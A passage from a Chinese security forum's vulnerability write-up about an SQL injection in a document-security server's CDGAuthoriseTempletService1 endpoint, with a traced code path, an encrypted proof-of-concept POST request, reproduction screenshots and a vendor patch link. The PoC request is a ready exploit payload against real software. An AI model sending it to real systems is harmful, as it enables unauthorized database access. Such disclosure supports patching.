9E+lraT4w9NxEIS5Ys5srLL8Lr6+TH//GvEByLvik07oeobya98vxZffuj6xugEVbfPjL+vOvjmO6PgxayYF9G2o2iXfiw6zeyQ0IrXHKY55cf+dzv405pvYF5sU3UniPHzGhlGOmSQOPqPH+s8h6uR9F9xtSjP1K7Qgc4wkeror23fLhEbWds3Y8BZjwrCUy7+Ijr4Yh2V5mfpXb3A/c3TcG+aS1AuFTV1PGlr36VgYPtPHT/rzm4vwMlPlh/LB0/++E8SY8yjzJ5G8s/ZPk4UDaz00gax01gxgmtODoa4JuGunvHVrq6ulC4BAhaGpsYP2k8VRVV5PJDdHbspbf7MFqa0OijD3j/OAOi5pbxLFq0iPXr19PR0XHEFYQjT6ajfJVff6wDeREmrY9hAujqHItbazj91NN44JE/0J1WKAe0dEAZw6HxmT1jPNed0UalGsLVWTIqzm8ef5OOwYCcA8HwCBoChE5z8Zknc8bk8Tz/8lpe2Z9myHVBf3grgVE6CoecrGLK1OlcdfmFTJk0Hl9pdm/fzDOPrmCgrwdPxPBFgq
<p blockindex=21>继续跟进发现调⽤ getAuthoriseTempletList 方法<br>
,发现此处进行拼接查询<br>
<img src="data:image/png;base64,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
<p blockindex=22>userId固定注入参数为secretLevelId构造xml数据包</p>
<p blockindex=23><img src="data:image/png;base64,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
<p blockindex=24>需要利用工具加密</p>
<p blockindex=25>poc</p>
<p blockindex=26>POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1</p>
<p blockindex=27>Host: x<br>
Content-Type: application/xml<br>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36</p>
<p blockindex=28>CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMAGKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGDOMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLFIBAGNJBLHDEJCIPHOPDOAMGLINIEJDIFOLLGEDIDMDAKIPEINHHOFBOHLPEJBPJBKJLDDEIFOGLGHKANECEEGNDCNMJNLNJBFKNGKKJFODMFEKBOGFNDNJMCMHOFJBLGHEBALFGNNGLPBMKHHHGNKNHJGLFLODDIKAAOOOAJAEMBLBNMGOFJELPABKOEGMFLIBGPMHJPEJCKFBGHHNGMDAJBKBNNMIMFELPGEHDFGNHMBLEIKMINOAOAINBLEOIGHAMOPDNOIFFEFLGBFOFAGACH</p>
<h2 blockindex=29>四.漏洞复现</h2>
<p blockindex=30><img src="data:image/png;base64,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
<h2 blockindex=31>官网补丁</h2>
<p blockindex=32><a href=https://update.nsfocus.com/update/downloads/id/159558>https://update.nsfocus.com/update/downloads/id/159558</a></p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-08-09 14:44:43
</li>
<li>阅读 ( 1376 )</li>
<li>分类:<a href=https://forum.butian.net/articles/OA target=_blank rel="noopenner noreferrer">OA产品</a>
</li>
<li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=527 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=527 data-support_num=8> 8 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=527> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">4 条评论</h2>
<div class=comment>
<div class=media>
<div class=media-left>
<a href=https://forum.butian.net/people/18148 class="avatar-link user-card" target=_blank rel="noopenner noreferrer">
<img class="avatar-40 hidden-xs" src='data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="709" height="709"><rect fill-opacity="0"/></svg>' alt data-sf-original-src=https://forum.butian.net/static/images/default_avatar.jpg style="background-blend-mode:normal!important;background-clip:content-box!important;background-position:50% 50%!important;background-color:rgba(0,0,0,0)!important;background-image:var(--sf-img-28)!important;background-size:100% 100%!important;background-origin:content-box!important;background-repeat:no-repeat!important"></a>
</div>
<div class=media-body>
<div class=media-heading>
<strong>
<a href=https://forum.butian.net/people/18148 class="mr-5 user-card">罗辑</a>
</strong>
<span class="answer-time text-muted hidden-xs">1秒前</span>
</div>
<div class=content>
<div class="text-fmt mt-10 mb-10">666</div>
</div>
<div class=media-footer>
<ul class="list-inline mb-20">
<li><a class="comments first-comment-reply" data-toggle=collapse href=#comment-2065 data-source=2065 data-source_id=2065 data-to_user_id=18148 data-source_type=comment data-message="回复 罗辑"><i class="fa fa-comment-o"></i> 0 条评论</a></li>
<li class=pull-right>
<button class="btn btn-default btn-sm btn-support" data-source_id=2065 data-source_type=comment data-support_num=0><i class="fa fa-thumbs-o-up"></i> 0</button>
</li>
</ul>
</div>
<div class="collapse widget-comments sf-hidden" id=comment-2065>
</div>
</div>
</div>
<div class=media>
<div class=media-left>
<a href=https://forum.butian.net/people/4139 class="avatar-link user-card" target=_blank rel="noopenner noreferrer">
<img class="avatar-40 hidden-xs" src='data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="709" height="709"><rect fill-opacity="0"/></svg>' alt data-sf-original-src=https://forum.butian.net/static/images/default_avatar.jpg style="background-blend-mode:normal!important;background-clip:content-box!important;background-position:50% 50%!important;background-color:rgba(0,0,0,0)!important;background-image:var(--sf-img-28)!important;background-size:100% 100%!important;background-origin:content-box!important;background-repeat:no-repeat!important"></a>
</div>
<div class=media-body>
<div class=media-heading>
<strong>
<a href=https://forum.butian.net/people/4139 class="mr-5 user-card">低哼</a>
</strong>
<span class="answer-time text-muted hidden-xs">1秒前</span>
</div>
<div class=content>
<div class="text-fmt mt-10 mb-10">tql</div>
</div>
<div class=media-footer>
<ul class="list-inline mb-20">
<li><a class="comments first-comment-reply" data-toggle=collapse href=#comment-2072 data-source=2072 data-source_id=2072 data-to_user_id=4139 data-source_type=comment data-message="回复 低哼"><i class="fa fa-comment-o"></i> 0 条评论</a></li>
<li class=pull-right>
<button class="btn btn-default btn-sm btn-support" data-source_id=2072 data-source_type=comment data-support_num=0><i class="fa fa-thumbs-o-up"></i> 0</button>
</li>
</ul>
</div>
<div class="collapse widget-comments sf-hidden" id=comment-2072>
</div>
</div>
</div>
<div class=media>
<div class=media-left>
<a href=https://forum.butian.net/people/18148 class="avatar-link user-card" target=_blank rel="noopenner noreferrer">
